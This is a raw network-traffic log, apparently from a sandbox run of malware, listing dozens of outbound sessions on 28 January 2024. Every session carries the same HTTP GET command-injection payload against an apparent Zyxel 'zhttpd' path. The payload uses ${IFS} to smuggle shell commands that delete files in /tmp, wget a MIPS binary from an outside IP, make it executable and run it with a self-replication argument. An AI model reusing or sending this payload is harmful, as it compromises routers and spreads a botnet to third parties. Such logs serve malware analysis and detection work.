                                                        Jan 28, 2024 10:13:06.670551062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7830192.168.2.1440644111.232.253.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670586109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7831192.168.2.1451212156.135.116.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670627117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7832192.168.2.1460634140.27.131.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670670986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7833192.168.2.1456150201.118.90.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670711040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7834192.168.2.1459340142.57.155.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670753002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7835192.168.2.144149280.96.194.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670777082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7836192.168.2.1444212166.58.193.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670838118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7837192.168.2.146031282.72.160.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670871973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7838192.168.2.1457856118.24.225.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670923948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7839192.168.2.145808671.206.81.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670949936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7840192.168.2.1451498138.53.98.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670991898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7841192.168.2.143696499.188.195.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671030998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7842192.168.2.1449614122.153.200.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671051979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7843192.168.2.1437174152.71.119.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671083927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7844192.168.2.1457838124.92.7.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671123981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7845192.168.2.145779470.61.176.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671142101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7846192.168.2.1443090205.174.75.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671181917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7847192.168.2.1445984145.120.95.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671221018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7848192.168.2.1460352171.226.53.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671256065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7849192.168.2.143946461.205.239.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671298027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7850192.168.2.1456332184.118.215.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671329975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7851192.168.2.1460750154.147.251.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671354055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7852192.168.2.144785448.10.95.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671401024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7853192.168.2.14408061.124.88.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671433926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7854192.168.2.1441324177.59.192.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671464920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7855192.168.2.145833236.102.252.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671494007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7856192.168.2.145479090.177.45.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671531916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7857192.168.2.1458330130.116.22.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671561003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7858192.168.2.14547428.245.197.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671587944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7859192.168.2.1433290114.53.5.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671631098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7860192.168.2.144914253.138.62.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671711922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7861192.168.2.143803068.184.78.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671711922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7862192.168.2.1442610160.97.132.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671753883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7863192.168.2.1436722175.131.225.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671777964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7864192.168.2.1457320155.112.25.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671807051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7865192.168.2.143741658.216.37.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671865940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7866192.168.2.145311087.73.100.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671904087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7867192.168.2.145299246.222.62.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671943903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7868192.168.2.145362045.160.97.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.671978951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7869192.168.2.14547329.158.45.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672009945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7870192.168.2.145346257.159.3.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672064066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7871192.168.2.1459308143.103.148.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672101974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7872192.168.2.1443462104.246.97.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672123909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7873192.168.2.1433884187.252.116.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672149897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7874192.168.2.1449798129.100.96.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672188997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7875192.168.2.145377442.108.84.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672224045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7876192.168.2.1439510183.95.14.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672256947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7877192.168.2.144715857.238.140.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672301054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7878192.168.2.145429885.188.82.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672348976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7879192.168.2.1440826218.14.32.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672380924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7880192.168.2.14350188.141.65.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672435999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7881192.168.2.145096414.176.77.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672461987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7882192.168.2.144124652.120.76.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672492981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7883192.168.2.143469245.59.137.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672552109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7884192.168.2.143688627.84.101.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672580957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7885192.168.2.143907479.26.70.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672626972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7886192.168.2.1443286204.195.54.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672657967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7887192.168.2.1437754217.189.139.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672702074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7888192.168.2.1442806184.238.211.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672729015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7889192.168.2.1446592198.3.173.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672771931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7890192.168.2.1447914210.103.163.120443
                                                        TimestampBytes transferredDirectionData
